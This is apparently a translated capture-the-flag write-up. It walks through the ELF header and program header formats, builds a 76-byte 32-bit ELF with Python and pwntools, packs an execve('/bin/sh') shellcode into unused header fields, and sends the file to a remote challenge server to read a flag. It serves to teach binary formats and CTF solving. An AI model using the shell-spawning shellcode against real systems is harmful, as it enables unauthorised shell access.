We write micro-shellcode in ELF format manually
The smallest possible 64 bit ELF is 80 bytes. Can you golf it down to 79 bytes?
And attached is a file spinning on a remote server. Opening the file in Ghidra, we see what is required of us:
Thus, the only way to solve the problem and get the flag is to write an executable ELF file (because the signature is checked at the beginning of the file). Of course, just in case, the Linux kernel code was checked for other ways to start with such a signature, but unfortunately, the shebang line must begin with #!
and other file formats are connected by modules, and in general are also not suitable.
Learning the ELF format
Armed with the standardlink) let’s try to start building at least some executable ELF file.
To begin with, we see that the file must begin with an ELF header, the structure of which is described as follows:
#define EI_NIDENT 16
typedef struct {
unsigned char e_ident[EI_NIDENT];
Elf32_Half e_type;
Elf32_Half e_machine;
Elf32_Word e_version;
Elf32_Addr e_entry;
Elf32_Off e_phoff;
Elf32_Off e_shoff;
Elf32_Word e_flags;
Elf32_Half e_ehsize;
Elf32_Half e_phentsize;
Elf32_Half e_phnum;
Elf32_Half e_shentsize;
Elf32_Half e_shnum;
Elf32_Half e_shstrndx;
} Elf32_Ehdr;
It uses its own data types for fields, they are defined for 32 bit ELF format (in 64-bit other definitions) just above in the document:
Name | Size | alignment | Explanation |
| 4 | 4 | Unsigned program address |
| 2 | 2 | Medium size unsigned number |
| 4 | 4 | Unsigned file offset |
| 4 | 4 | Signed large number |
| 4 | 4 | unsigned large number |
| 1 | 1 | unsigned small number |
The header fields themselves have the following meaning:
e_ident
— ELF file identifier (described in detail below)e_type
– type of ELF file, for our purposes, the value 2 “Executable file” is suitablee_machine
– the field is intended to determine the required processor architecture for working with the ELF file, but apparently it is not really used much. The document lists some of the first types, but is incomplete (for example, the GCC compiler on my system puts the type0x3e
“Advanced Micro Devices X86-64”), choose 3 “Intel 80386” for the reason belowe_version
– according to the document, it should be equal to 1e_entry
– an important field for us, the address of the entry point to the program in memory (not from the beginning of the file)e_phoff
– another important field, the offset from the beginning of the file to the program headers (Program Header), which are used to run the ELF filee_shoff
– a field that sets the offset to the section headers (Section Header), which are used to link the file, for our purposes its value plays no role and it will be important in the futuree_flags
– the field that sets the flags specific to the processor, as it turned out, is also not importante_ehsize
– the size of the header of the ELF file, despite the apparent significance, the Linux kernel apparently ignores the value of this field when starting the filee_phentsize
– the size of each of the program headers, in my case it is 32 bytes, in accordance with the header according to the specificatione_phnum
— number of program headers, 1e_shentsize
— the size of each of the section headers, 0e_shnum
— number of section headers, must be 0e_shstrndx
— index in the array of section headers, corresponding to the section with a table of string names, must also have the value 0
At this stage of reading, it is not very clear what the endianness of numbers should be, and the documentation answers this question below, in the section on ELF identification. The ELF file ID is 16 bytes long (as mentioned above) and has the following structure:
Signature:
\x7fELF
or7f 45 4c 46
in hexadecimal representationFile class: 1 for ELF32, 2 for ELF64
Encoding: 1 for little-endian, 2 for big-endian
Version: Same as header version field, 1
Alignment: 9 zeros to pad up to 16 bytes, their value is ignored by the standard
Much lower, in the Intel identification section, it is indicated that little-endian values \u200b\u200bmust be used for identification, and in the field e_machine
should be 3.
Now everything is ready to collect the first header of the file:
elf_header = bytes([
*b'\x7fELF', 1, 1, 1, *([0] * 9), # e_ident
*2 .to_bytes(2, 'little'), # e_type
*3 .to_bytes(2, 'little'), # e_machine
*1 .to_bytes(4, 'little'), # e_version
*0 .to_bytes(4, 'little'), # e_entry TODO
*52 .to_bytes(4, 'little'), # e_phoff
*0 .to_bytes(4, 'little'), # e_shoff
*0 .to_bytes(4, 'little'), # e_flags
*52 .to_bytes(2, 'little'), # e_ehsize
*32 .to_bytes(2, 'little'), # e_phentsize
*1 .to_bytes(2, 'little'), # e_phnum
*0 .to_bytes(2, 'little'), # e_shentsize
*0 .to_bytes(2, 'little'), # e_shnum
*0 .to_bytes(2, 'little'), # e_shstrndx
])
There is a missing field here e_entry
, because we don’t know how to fill it yet. Therefore, it is time to proceed to the second heading – the heading of the program. Its structure is described as follows:
typedef struct {
Elf32_Word p_type;
Elf32_Off p_offset;
Elf32_Addr p_vaddr;
Elf32_Addr p_paddr;
Elf32_Word p_filesz;
Elf32_Word p_memsz;
Elf32_Word p_flags;
Elf32_Word p_align;
} Elf32_Phdr;
Description of fields:
p_type
– segment type, in our case it will be 1 “Downloadable”p_offset
– offset from the beginning of the file to the contents of the segmentp_vaddr
— virtual address of the segmentp_paddr
– the physical address of the segment for OS that do not use virtual addressingp_filesz
— segment size in the filep_memsz
– the size of the segment in memory, cannot be lessp_filesz
if more — the tail of the segment is filled with zerosp_flags
– segment flags, in our case it will be the value 5, corresponding to setting bit 1 for execution and 4 for readingp_align
– the required segment alignment, in practice it turned out that it cannot be completely arbitrary, for the Linux system the value came up0x1000
corresponding to the alignment of virtual memory pages
Now you can write the title of the program:
program_header = bytes([
*1 .to_bytes(4, 'little'), # p_type
*0 .to_bytes(4, 'little'), # p_offset TODO
*0 .to_bytes(4, 'little'), # p_vaddr TODO
*0 .to_bytes(4, 'little'), # p_paddr TODO
*0 .to_bytes(4, 'little'), # p_filesz TODO
*0 .to_bytes(4, 'little'), # p_memsz TODO
*5 .to_bytes(4, 'little'), # p_flags
*0x1000 .to_bytes(4, 'little'), # p_align
])
In this header, there are already quite a lot of values left for the future, which means that you need to write the code of the program itself. For simplicity, let’s just write a successful output:
mov eax, 1 ; номер системного вызова sys_exit
xor ebx, ebx ; возвращаемый status-code
int 0x80 ; программное прерывание syscall в Linux
To assemble the file I use pwntoolsso the resulting code will look like this:
from pwn import *
MEMORY_START = 0x1000
code = asm(f'''
mov eax, 1
xor ebx, ebx
int 0x80
''', arch="x86", os="linux")
elf_header = bytes([
*b'\x7fELF', 1, 1, 1, *([0] * 9), # e_ident
*2 .to_bytes(2, 'little'), # e_type
*3 .to_bytes(2, 'little'), # e_machine
*1 .to_bytes(4, 'little'), # e_version
*(MEMORY_START + 84).to_bytes(4, 'little'), # e_entry
*52 .to_bytes(4, 'little'), # e_phoff
*0 .to_bytes(4, 'little'), # e_shoff
*0 .to_bytes(4, 'little'), # e_flags
*52 .to_bytes(2, 'little'), # e_ehsize
*32 .to_bytes(2, 'little'), # e_phentsize
*1 .to_bytes(2, 'little'), # e_phnum
*0 .to_bytes(2, 'little'), # e_shentsize
*0 .to_bytes(2, 'little'), # e_shnum
*0 .to_bytes(2, 'little'), # e_shstrndx
])
program_header = bytes([
*1 .to_bytes(4, 'little'), # p_type
*0 .to_bytes(4, 'little'), # p_offset
*MEMORY_START.to_bytes(4, 'little'), # p_vaddr
*MEMORY_START.to_bytes(4, 'little'), # p_paddr
*(84 + len(code)).to_bytes(4, 'little'), # p_filesz
*(84 + len(code)).to_bytes(4, 'little'), # p_memsz
*5 .to_bytes(4, 'little'), # p_flags
*0x1000 .to_bytes(4, 'little'), # p_align
])
print(len(elf_header), elf_header)
print(len(program_header), program_header)
print(len(code), code)
with open('./result', 'wb') as f:
f.write(elf_header)
f.write(program_header)
f.write(code)
Behind the scenes was the choice of values p_vaddr
And p_paddr
. Works on my system 0x1000
, but when all the work was done and it was time to send the solution to the server, the program refused to work. It turned out that, for example, in Ubuntu Linux, there is a limitation vm.mmap_min_addr
equal 0x10000
. In general, it is recommended to use the value 0x8048100
which is described in the document in the section “Operating System Specific (UNIX System V Release 4)”.
Also, you cannot load the program from anywhere, for example, you cannot take the bytes after the header, because they are not aligned to 0x1000
which is indicated in p_align
. Therefore, we load from the beginning of the file, and then we ask to start execution from the start.
Let’s check that everything works:
Of course, not the required 79 bytes, but at least it works. But 93 bytes is also not bad, albeit for a program that does nothing.
Compressing the file
In order to reduce the file size, let’s look at it in hexadecimal code:
Our ELF header is marked in red, the program header is in green, the rest is code.
Here, the coincidence of the last 8 bytes of the ELF header and the first 8 bytes of the program header is immediately striking. Moreover, this coincidence has almost no effect on us as programmers, because it contains mostly data that we still could not replace with anything for correct operation.
Now let’s think about what we would like to do in general. It is clear that we already have little space, so read the flag file (which is located in the same directory and has the name flag.txt
) and will not display on the screen. Let’s try the classic trick then and run /bin/sh
.
This is done with just one system call, but you still need to store a string with the path to run somewhere. Here 9 bytes of alignment at the end of the identifier will help us! You also need to pass arrays argv
And envp
for arguments and environment variables, but we’ll just ignore that and send null pointers. Fortunately, this is allowed, and what’s more, when the program starts, the system carefully fills all the registers with zeros for us, so we don’t have to do anything at all. So with the optimizations mentioned, the code now looks like this:
from pwn import *
MEMORY_START = 0x08048000
HEADER_LENGTH = 76
code = asm(f'''
mov eax, 11
mov ebx, {MEMORY_START + 8}
int 0x80
''', arch="x86", os="linux")
header = bytes([
*b'\x7fELF', 1, 1, 1, 0, *b'/bin/sh', 0, # e_ident
2, 0, 3, 0, 1, 0, 0, 0, # e_type, e_machine, e_version
*(MEMORY_START + HEADER_LENGTH).to_bytes(4, 'little'), # e_entry
44, 0, 0, 0, # e_phoff
*([0] * 10), # e_shoff, e_flags, e_ehsize
32, 0, 1, 0, 0, 0, 0, 0, 0, 0, # e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
# p_type, p_offset
*MEMORY_START.to_bytes(4, 'little'), # p_vaddr
*MEMORY_START.to_bytes(4, 'little'), # p_paddr
*HEADER_LENGTH.to_bytes(4, 'little'), # p_filesz
*HEADER_LENGTH.to_bytes(4, 'little'), # p_memsz
5, 0, 0, 0, 0, 0x10, 0, 0, # p_flags, p_align
])
assert len(header) == HEADER_LENGTH
print(len(header), header)
print(len(code), code)
with open('./result', 'wb') as f:
f.write(header)
f.write(code)
Check if it still works:
At this stage, it is already becoming clear where the 76 bytes from the preface came from, because we just have to remove the assembly code somewhere.
Packing the code in the header
First, let’s see how we can generally reduce our current code:
mov eax, 11
mov ebx, 0x08048008
int 0x80
It is clear that the last instruction cannot be put anywhere, filling ebx
too, although it depends on the value, but it will definitely not work to reduce it to 2 bytes, but initialization eax
easily transcribed into mov al, 11
:
0: b0 0b mov al, 0xb
2: bb 08 80 04 08 mov ebx, 0x8048008
7: cd 80 int 0x80
We get only 9 bytes! We recall from the beginning of the story that the fields e_shoff
, e_flags
And e_ehsize
are not used, and they just occupy 10 bytes in the header. It remains only to put everything together:
MEMORY_START = 0x08048000
HEADER_LENGTH = 76
header = bytes([
*b'\x7fELF', 1, 1, 1, 0, *b'/bin/sh', 0, # e_ident
2, 0, 3, 0, 1, 0, 0, 0, # e_type, e_machine, e_version
*(MEMORY_START + 32).to_bytes(4, 'little'), # e_entry
44, 0, 0, 0, # e_phoff
0xb0, 0x0b, # mov al, 11
0xbb, *(MEMORY_START + 8).to_bytes(4, 'little'), # mov ebx, MEMORY_START + 8
0xcd, 0x80, # int 0x80
0,
32, 0, 1, 0, 0, 0, 0, 0, 0, 0, # e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
# p_type, p_offset
*MEMORY_START.to_bytes(4, 'little'), # p_vaddr
*MEMORY_START.to_bytes(4, 'little'), # p_paddr
*HEADER_LENGTH.to_bytes(4, 'little'), # p_filesz
*HEADER_LENGTH.to_bytes(4, 'little'), # p_memsz
5, 0, 0, 0, 0, 0x10, 0, 0, # p_flags, p_align
])
assert len(header) == HEADER_LENGTH
print(len(header), header)
with open('./result', 'wb') as f:
f.write(header)
You can see how we have moved from elf_header
, program_header
And code
first to header
And code
and now to simply header
=)
First, let’s make sure the kernel can still run the file:
But there are, of course, and unpleasant moments. For example, gdb now refuses to run our file, although this is bypassed by running through gdbserver, but still unpleasant.
Getting the flag
To get the flag, let’s write another script so as not to bother with redirecting input first from the file, and then from the terminal, or something like that:
from pwn import *
# sh = process(['./chal'])
sh = remote(...)
with open('result', 'rb') as f:
sh.send(f.read())
sh.interactive()
And finally, we get the flag:
Afterword
Of course, many points were missed along the way, both in solving the task and in the details of the ELF format, but this material should be taken primarily as a how-to for solving similar CTF tasks, that is, write-up, rather than a full-fledged textbook on the ELF format.
Thanks for reading! I hope the above seemed interesting, do not be afraid to understand the specifications and even more so perceive the work of individual parts of a computer or operating system as something magical. Everything has sources.